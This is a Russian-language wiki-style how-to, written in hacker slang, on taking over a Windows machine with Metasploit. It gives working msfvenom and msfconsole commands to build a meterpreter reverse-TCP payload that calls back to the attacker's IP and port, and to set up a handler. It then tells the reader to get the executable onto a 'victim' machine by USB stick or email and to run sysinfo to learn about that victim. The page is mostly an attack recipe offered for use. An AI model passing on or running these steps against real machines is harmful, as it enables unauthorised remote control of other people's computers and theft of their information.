Взлом Windows через Metasploit
Перейти к навигации
Перейти к поиску
Metasploit — фреймворк для пентеста, который юзают как ламеры, так и труЪ хакеры. С его помощью можно ломать Windows на раз-два, если жертва совсем тупая.
Что нужно[править]
- Кали Линукс (или другой дистрибутив с Metasploit)
- Виртуальная машина с Windows (жертва)
- Прямые руки
Приготовление[править]
- Запускаем терминал в Кали.
- Генерируем пейлоад:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=Your_Machine_IP LPORT=4444 -f exe -o Payload.exe
- LHOST: IP адрес твоей машины
- LPORT: Порт для подключения (4444 или любой другой)
- Payload.exe: Имя файла с пейлоадом
- Запускаем Metasploit консоль:
msfconsole
Настройка[править]
- Выбираем эксплойт:
use exploit/multi/handler
- Смотрим настройки:
show options
- Устанавливаем LHOST и PAYLOAD:
set LHOST Your_Machine_IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Запуск[править]
- Запускаем эксплойт:
run
- Переносим Payload.exe на машину жертвы (через флешку, почту, шелл-код — как хочешь).
- Запускаем Payload.exe на машине жертвы.
- PROFIT!
Инфа о жертве[править]
- После подключения вводим команду:
sysinfo
- Теперь ты знаешь ОС, архитектуру, имя пользователя и другую инфу о жертве.